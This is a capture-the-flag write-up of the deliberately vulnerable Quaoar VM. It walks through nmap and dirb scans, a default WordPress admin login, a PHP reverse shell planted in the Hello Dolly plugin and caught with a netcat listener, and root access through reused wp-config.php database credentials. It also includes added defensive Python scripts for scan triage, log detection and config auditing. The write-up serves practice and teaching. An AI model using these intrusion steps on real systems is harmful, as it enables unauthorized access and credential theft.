hackfest2016: Quaoar

[VM Completed on May 18th, 2017]

This machine was created for the Hackfest 2016 conference, which is held in Quebec City, Quebec, Canada. This is a conference I am hoping to attend one year. Looks like a great time. There are three flags on this box according to the information on the VM, but I could only find two: the shell flag and the root flag. Not sure what the post-exploitation flag is. Anyways, let's jump into it.

nmap time:

root@kali:~# nmap -A -p- 192.168.1.243

Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-17 08:52 ADT
Nmap scan report for Quaoar (192.168.1.243)
Host is up (0.00047s latency).
Not shown: 65526 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA)
|   2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA)
|_  256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA)
53/tcp  open  domain      ISC BIND 9.8.1-P1
| dns-nsid: 
|_  bind.version: 9.8.1-P1
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_Hackers
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: UIDL CAPA SASL PIPELINING STLS RESP-CODES TOP
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2017-05-17T11:53:13+00:00; +15s from scanner time.
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: IMAP4rev1 STARTTLS have LOGIN-REFERRALS more post-login SASL-IR LITERAL+ listed capabilities OK LOGINDISABLEDA0001 IDLE ID Pre-login ENABLE
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2017-05-17T11:53:14+00:00; +15s from scanner time.
445/tcp open  netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
|_imap-capabilities: IMAP4rev1 have LOGIN-REFERRALS more post-login SASL-IR LITERAL+ ENABLE capabilities OK listed AUTH=PLAINA0001 ID Pre-login IDLE
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2017-05-17T11:53:13+00:00; +15s from scanner time.
995/tcp open  ssl/pop3    Dovecot pop3d
|_pop3-capabilities: UIDL CAPA SASL(PLAIN) RESP-CODES PIPELINING USER TOP
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2017-05-17T11:53:13+00:00; +15s from scanner time.
MAC Address: 00:0C:29:82:B2:1D (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 14s, deviation: 0s, median: 14s
|_nbstat: NetBIOS name: QUAOAR, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.6.3)
|   Computer name: Quaoar
|   NetBIOS computer name: 
|   Domain name: 
|   FQDN: Quaoar
|_  System time: 2017-05-17T07:53:13-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   0.47 ms Quaoar (192.168.1.243)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.39 seconds
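
The scan above already contains the findings a defender would fix on this box (SMB signing off, SMBv1 only, guest SMB access, plaintext mail ports, an old Apache 2.2 and OpenSSH). As an added example that is not part of the original writeup, here is a small Python triage script run over a trimmed, constructed excerpt of that nmap output; the rule set and the smb.conf/Dovecot settings it recommends are illustrative, not a complete policy.

```python
"""Triage an nmap -A text report for findings worth remediating.

Added example for this writeup, not part of the original post. NMAP_REPORT is
a constructed, trimmed excerpt of the scan shown above; the rules are a small
illustrative set, not a complete hardening policy.
"""
import re

NMAP_REPORT = """\
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
53/tcp  open  domain      ISC BIND 9.8.1-P1
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
110/tcp open  pop3        Dovecot pop3d
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
445/tcp open  netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
995/tcp open  ssl/pop3    Dovecot pop3d
Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
"""

# One row of the "PORT STATE SERVICE VERSION" table.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

SEVERITY_RANK = {"high": 0, "medium": 1, "info": 2}


def parse_ports(report):
    """Return one dict per port row; NSE script lines (starting with '|') are skipped."""
    ports = []
    for line in report.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({
                "port": int(m.group(1)),
                "proto": m.group(2),
                "state": m.group(3),
                "service": m.group(4),
                "version": m.group(5).strip(),
            })
    return ports


def triage(report):
    """Map scan observations to (severity, finding, mitigation) tuples, highest severity first."""
    findings = []
    smb_ports = []
    for p in parse_ports(report):
        if p["state"] != "open":
            continue
        if p["port"] in (110, 143):
            findings.append(("medium",
                             f"{p['port']}/tcp {p['service']}: plaintext mail port exposed",
                             "reject logins before STARTTLS (Dovecot: disable_plaintext_auth = yes) "
                             "or serve only the TLS ports 993/995"))
        if p["service"] == "netbios-ssn":
            smb_ports.append(p["port"])
        if p["service"] == "ssh" and re.search(r"OpenSSH [0-6]\.", p["version"]):
            findings.append(("high",
                             f"{p['port']}/tcp: outdated {p['version'].split(' (')[0]}",
                             "upgrade OpenSSH to a supported release"))
        if re.search(r"Apache httpd 2\.2\.", p["version"]):
            findings.append(("high",
                             f"{p['port']}/tcp: Apache httpd 2.2 branch is end of life",
                             "upgrade to a supported 2.4.x release"))
    if smb_ports:
        findings.append(("medium",
                         "SMB exposed on " + ", ".join(str(x) for x in smb_ports),
                         "firewall SMB to trusted networks"))
    # Host-script observations are not in the port table, so match them on the raw text.
    if "message_signing: disabled" in report:
        findings.append(("high", "SMB signing disabled",
                         "set 'server signing = mandatory' in smb.conf"))
    if "Server doesn't support SMBv2" in report:
        findings.append(("high", "SMBv1-only file server",
                         "set 'server min protocol = SMB2' in smb.conf"))
    if re.search(r"account_used:\s+guest", report):
        findings.append(("medium", "SMB accepted guest access during the scan",
                         "set 'map to guest = Never' and 'restrict anonymous = 2' in smb.conf"))
    return sorted(findings, key=lambda f: SEVERITY_RANK[f[0]])


if __name__ == "__main__":
    for sev, finding, fix in triage(NMAP_REPORT):
        print(f"[{sev:6}] {finding} -> {fix}")
```

Feed it the full `nmap -A` text (or `-oN` output) and the port table is parsed the same way; the host-script checks are plain substring matches on nmap's own wording, so they are tied to the script versions in use.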

So we got some basic services opened here. Got a hit on a webserver, so let's check that out.

[Screenshot: website1]

[Screenshot: website2]

Alright. Not much to see here. Let's run a directory brute-forcer (dirb) on it and see what it finds.

root@kali:~# dirb http://192.168.1.243 /usr/share/wordlists/dirb/big.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed May 17 08:57:37 2017
URL_BASE: http://192.168.1.243/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

-----------------

GENERATED WORDS: 20458                                                         

---- Scanning URL: http://192.168.1.243/ ----
+ http://192.168.1.243/LICENSE (CODE:200|SIZE:1672)                                
+ http://192.168.1.243/cgi-bin/ (CODE:403|SIZE:289)                                
+ http://192.168.1.243/hacking (CODE:200|SIZE:616848)                              
+ http://192.168.1.243/index (CODE:200|SIZE:100)                                   
+ http://192.168.1.243/robots (CODE:200|SIZE:271)                                  
+ http://192.168.1.243/robots.txt (CODE:200|SIZE:271)                              
+ http://192.168.1.243/server-status (CODE:403|SIZE:294)                           
==> DIRECTORY: http://192.168.1.243/upload/                                        
==> DIRECTORY: http://192.168.1.243/wordpress/ 

...truncated...

WordPress was found. Awesome! Let's snoop around there.

[Screenshot: website3]

Since this VM is marked as really easy, I'm going to try the default credentials to see what happens. It's always a good first choice anyways. The default credentials for WordPress are admin:admin. And voila! It worked.

[Screenshot: website4]

So I know there are easy ways to pop a reverse shell at this point with automated tools, but I like tinkering around. I edited the Hello Dolly plugin that comes with WordPress and inserted a PHP reverse shell. I then opened a netcat listener and waited for the shell to pop once I activated the plugin. It worked, so now I have my low-level shell.

root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.1.2] from (UNKNOWN) [192.168.1.243] 36687
Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux
 21:21:45 up 1 day, 13:30,  0 users,  load average: 0.08, 0.08, 0.17
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@Quaoar:/$ 
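
From the defender's side, the step that turned an admin login into a shell (writing PHP through the plugin editor and then activating the plugin) leaves a very recognisable trail in the Apache access log. The post does not say exactly how the plugin was edited, so this added example (not from the original writeup) assumes the built-in wp-admin plugin editor, plugin-editor.php, and the normal activation link on plugins.php; ACCESS_LOG is constructed sample data in Apache combined format, with the attacker address taken from the listener output above.

```python
"""Spot dashboard-driven plugin tampering in Apache access logs.

Added example, not from the original writeup. Assumes the plugin was edited
through wp-admin/plugin-editor.php and activated via plugins.php; the log lines
below are constructed sample data in Apache combined log format.
"""
import re
from datetime import datetime, timedelta
from urllib.parse import urlparse, parse_qs

ACCESS_LOG = """\
192.168.1.2 - - [17/May/2017:21:15:02 -0300] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.1.2 - - [17/May/2017:21:18:40 -0300] "GET /wordpress/wp-admin/plugin-editor.php?file=hello.php HTTP/1.1" 200 41233 "-" "Mozilla/5.0"
192.168.1.2 - - [17/May/2017:21:19:55 -0300] "POST /wordpress/wp-admin/plugin-editor.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.1.2 - - [17/May/2017:21:20:10 -0300] "GET /wordpress/wp-admin/plugins.php?action=activate&plugin=hello.php&_wpnonce=0123abcd HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.1.50 - - [17/May/2017:21:25:01 -0300] "GET /wordpress/ HTTP/1.1" 200 9821 "-" "Mozilla/5.0"
"""

# Leading fields of the combined log format: client, ident, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# The two in-dashboard editors that can write PHP to disk.
EDITOR_PAGES = ("plugin-editor.php", "theme-editor.php")


def parse_log(text):
    """Return one event dict per parseable log line."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlparse(m.group("target"))
        events.append({
            "ip": m.group("ip"),
            "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
            "method": m.group("method"),
            "path": url.path,
            "query": parse_qs(url.query),
            "status": int(m.group("status")),
        })
    return events


def detect(text, window=timedelta(minutes=15)):
    """Return alerts as (severity, client_ip, description) tuples, in log order."""
    alerts = []
    logins = {}  # client ip -> time of its last successful-looking wp-login.php POST
    for e in parse_log(text):
        base = e["path"].rsplit("/", 1)[-1]
        # A 302 after the login POST means WordPress redirected into the dashboard;
        # a failed login re-renders the form with a 200.
        if base == "wp-login.php" and e["method"] == "POST" and e["status"] == 302:
            logins[e["ip"]] = e["ts"]
        elif base in EDITOR_PAGES and e["method"] == "POST":
            desc = f"code written via in-dashboard editor {base}"
            last = logins.get(e["ip"])
            if last is not None and e["ts"] - last <= window:
                secs = int((e["ts"] - last).total_seconds())
                desc += f", {secs}s after a dashboard login"
            alerts.append(("high", e["ip"], desc))
        elif base == "plugins.php" and e["query"].get("action") == ["activate"]:
            plugin = e["query"].get("plugin", ["?"])[0]
            alerts.append(("medium", e["ip"], f"plugin activated: {plugin}"))
    return alerts


if __name__ == "__main__":
    for sev, ip, desc in detect(ACCESS_LOG):
        print(f"[{sev:6}] {ip}: {desc}")
```

The editor write is the high-signal event: legitimate sites rarely edit plugin source from the dashboard, and `define('DISALLOW_FILE_EDIT', true);` in wp-config.php removes the editor entirely, so any POST to these pages afterwards is worth an alert on its own.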


Flag 1:

www-data@Quaoar:/home/wpadmin$ ls
ls
flag.txt

www-data@Quaoar:/home/wpadmin$ cat flag.txt
cat flag.txt
2bafe61f03117ac66a73c3c514de796e

Now, it's time to get my root shell. First things first, let's check the passwd file:

    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh

.......Truncated....... 

    postgres:x:115:124:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
    tomcat6:x:116:126::/usr/share/tomcat6:/bin/false
    wpadmin:x:1001:1001::/home/wpadmin:/bin/sh

There is a user called wpadmin. Again, let's try the easy stuff. I used su to switch user to wpadmin and used the password wpadmin. It worked. So now I know the user account. I can also ssh into the box now instead of using my netcat listener. More stable. Stable is good.

I tried to sudo su my way to root, but wpadmin isn't allowed to use sudo. I poked around and tried a few kernel exploits that were potentially capable of giving me my root prompt, but no such luck. So since the box is running WordPress, I checked the config file to see if there was anything juicy in there.

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/** */
define('WP_HOME','/wordpress/');
define('WP_SITEURL','/wordpress/');


Ha. Ha... this is interesting. This just might be the info I'm looking for.

wpadmin@Quaoar:/var/www/wordpress$ su
Password: rootpassword!
root@Quaoar:/var/www/wordpress# 
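
Two credential mistakes stack up on this box: WordPress connects as the MySQL superuser, and that superuser's password doubles as the OS root password, so anyone who can read wp-config.php (here, the wpadmin account, itself using its username as its password) gets both. As an added example that is not the original post's code, here is a Python audit of the wp-config.php defines shown above; WEAK_CONFIG reproduces those defines, HARDENED_CONFIG is a constructed counterpart with a dedicated DB user (wp_quaoar, a made-up name) and a placeholder password. A config checker cannot see that the DB password is reused elsewhere, which is exactly why it insists on a dedicated, least-privilege DB account rather than just scoring password length.

```python
"""Audit a wp-config.php excerpt for the credential problems this box shows.

Added example, not the original post's code. WEAK_CONFIG reproduces the
defines from the writeup; HARDENED_CONFIG is constructed, with a made-up DB
user name and a placeholder password that must be replaced by a random one.
"""
import re

WEAK_CONFIG = """\
define('DB_USER', 'root');
define('DB_PASSWORD', 'rootpassword!');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');
define('WP_HOME','/wordpress/');
define('WP_SITEURL','/wordpress/');
"""

HARDENED_CONFIG = """\
// dedicated account granted only on the WordPress database (constructed name)
define('DB_USER', 'wp_quaoar');
// placeholder: generate a long random secret and never reuse it for an OS account
define('DB_PASSWORD', 'REPLACE-WITH-32-RANDOM-CHARS');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');
define('WP_HOME','/wordpress/');
define('WP_SITEURL','/wordpress/');
// removes the dashboard plugin/theme editor used for the reverse shell
define('DISALLOW_FILE_EDIT', true);
"""

# define('NAME', 'string') or define('NAME', true/false)
DEFINE_RE = re.compile(r"define\(\s*'(\w+)'\s*,\s*(?:'([^']*)'|(true|false))\s*\)")


def parse_defines(text):
    """Return {constant: value}; PHP booleans become Python booleans."""
    out = {}
    for key, string_val, bool_val in DEFINE_RE.findall(text):
        out[key] = string_val if bool_val == "" else (bool_val == "true")
    return out


def audit_wp_config(text, min_len=16):
    """Return a list of human-readable findings; empty means no rule fired."""
    cfg = parse_defines(text)
    findings = []
    user = cfg.get("DB_USER", "")
    pw = cfg.get("DB_PASSWORD", "")
    if user == "root":
        findings.append("DB_USER is the MySQL superuser; create a dedicated account "
                        "granted only on the WordPress database")
    if not pw:
        findings.append("DB_PASSWORD is empty")
    else:
        if len(pw) < min_len:
            findings.append(f"DB_PASSWORD is shorter than {min_len} characters")
        if user and user.lower() in pw.lower():
            findings.append("DB_PASSWORD contains the DB username")
        if "password" in pw.lower():
            findings.append("DB_PASSWORD contains the word 'password'")
    if cfg.get("DISALLOW_FILE_EDIT") is not True:
        findings.append("DISALLOW_FILE_EDIT is not set; the dashboard editor can write PHP to disk")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"{name}: {audit_wp_config(text) or ['ok']}")
```

Run it against a real file with `audit_wp_config(open('wp-config.php').read())`; the regex only understands single-quoted string and boolean defines, which is what the stock wp-config.php uses. The password rules are deliberately crude: the real fix for what this box shows is a unique, generated DB password and a file that only the web server user can read.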

Flag 2:

root@Quaoar:/var/www/wordpress# cd /root
root@Quaoar:~# ls
flag.txt  vmware-tools-distrib
root@Quaoar:~# cat flag.txt 
8e3f9ec016e3598c5eec11fd3d73f6fb

All done!!! Great VM for beginners to poke around on and see what they can do. It was really fun!